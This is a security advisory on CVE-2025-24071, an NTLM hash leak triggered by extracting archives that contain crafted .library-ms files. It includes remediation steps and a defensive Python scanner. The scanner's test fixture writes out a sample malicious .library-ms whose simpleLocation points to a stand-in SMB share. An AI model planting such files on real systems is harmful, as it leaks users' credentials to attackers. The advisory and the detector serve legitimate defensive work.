March 21, 2025
Severity
High
Analysis Summary
A newly discovered security vulnerability, CVE-2025-24071, allows attackers to steal NTLM hashes when a user extracts specially crafted RAR or ZIP files. The flaw, reported by a security researcher, is considered a high-risk issue.
The vulnerability is caused by how Windows Explorer handles “.library-ms” files inside compressed archives. When a malicious .library-ms file containing an SMB path is extracted, Windows automatically processes the file to generate previews and index metadata. This happens without any user interaction, making the attack stealthy.
Attackers can craft a .library-ms file with a <simpleLocation> tag that points to an SMB server under their control. When the file is extracted, Windows attempts to connect to this server to gather metadata. This action triggers an automatic NTLM authentication handshake, sending the victim’s NTLMv2 hash to the attacker.
Security researchers used tools like Procmon and Wireshark to observe Windows Explorer and indexing services automatically performing file operations, including opening the malicious file and initiating SMB communication. The network captures clearly show NTLM authentication requests being sent to the attacker’s SMB server.
This vulnerability is actively being exploited in the wild and has reportedly been offered for sale on underground forums by a threat actor known as “Krypton,” who is also linked to the development of the “EncryptHub Stealer” malware.
A proof-of-concept (PoC) exploit for CVE-2025-24071 is available on GitHub, and a Metasploit module has also been developed. Microsoft has addressed this flaw in its latest Patch Tuesday update. Users are advised to apply the security patch immediately to protect their systems.
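The mechanism described above can be checked for before extraction, for example at a mail gateway or a file-drop scanner. The following is an added example, not code from the advisory: it opens a ZIP archive, finds every .library-ms entry (case-insensitively, at any depth), and flags any <simpleLocation> that points to a remote share (UNC path or smb:// URL). The sample archive and the 192.0.2.10 address are constructed for the demonstration; RAR archives would need a third-party reader, which is omitted here.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# UNC paths (\\host\share) and smb:// URLs: anything that resolves to a remote share.
REMOTE_LOCATION = re.compile(r"^\s*(\\\\|//|smb://)", re.IGNORECASE)

def remote_locations(xml_bytes):
    """Text of every <simpleLocation> descendant pointing at a remote share (namespace-agnostic)."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []  # caller still reports the entry as a .library-ms file
    hits = []
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1].lower() != "simplelocation":
            continue
        hits += [c.text.strip() for c in el.iter() if c.text and REMOTE_LOCATION.match(c.text)]
    return hits

def scan_zip(data):
    """Scan an in-memory ZIP; returns (entry_name, verdict, remote_locations) per .library-ms entry."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):  # extension check is case-insensitive
                continue
            locs = remote_locations(zf.read(info))
            verdict = "HIGH: remote simpleLocation" if locs else "SUSPICIOUS: .library-ms in archive"
            findings.append((info.filename, verdict, locs))
    return findings

# Constructed sample (not a real malware sample): a benign text file plus a nested .library-ms
# whose <simpleLocation> points at a TEST-NET-1 address. The namespace is Microsoft's documented one.
SAMPLE_LIBRARY_MS = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
    '<simpleLocation><url>\\\\192.0.2.10\\share</url></simpleLocation>'
    '</libraryDescription>'
)

def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.txt", "benign content")
        zf.writestr("docs/Report.LIBRARY-MS", SAMPLE_LIBRARY_MS)
    return buf.getvalue()
```

Running `scan_zip(build_sample_zip())` reports the nested entry as HIGH with the remote share it references; a .library-ms that only points at a local folder is still reported as SUSPICIOUS, which matches the "block from untrusted sources" guidance below.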
Impact
- Unauthorized Access
Indicators of Compromise
CVE
CVE-2025-24071
Remediation
- Refer to the Microsoft Security Update Guide entry that addresses CVE-2025-24071.
- Block outbound SMB traffic (ports 445, 137-139) at the firewall to prevent NTLM hash leaks.
- Disable NTLM authentication where possible or enforce NTLMv2-only authentication policies.
- Use Group Policy to block the execution of .library-ms files from untrusted sources.
- Configure Windows Defender or endpoint security solutions to detect and block malicious .library-ms files.
- Avoid extracting unknown or untrusted RAR/ZIP archives, especially from email attachments or unverified sources.
- Monitor network traffic for unusual SMB authentication attempts, especially to external servers.
- Regularly review and audit NTLM authentication events in Windows Event Logs to detect potential abuse.
- Use tools like Procmon or Wireshark to analyze suspicious file extraction behavior and network activity.
- Educate employees about phishing tactics and the risks of extracting files from unknown sources.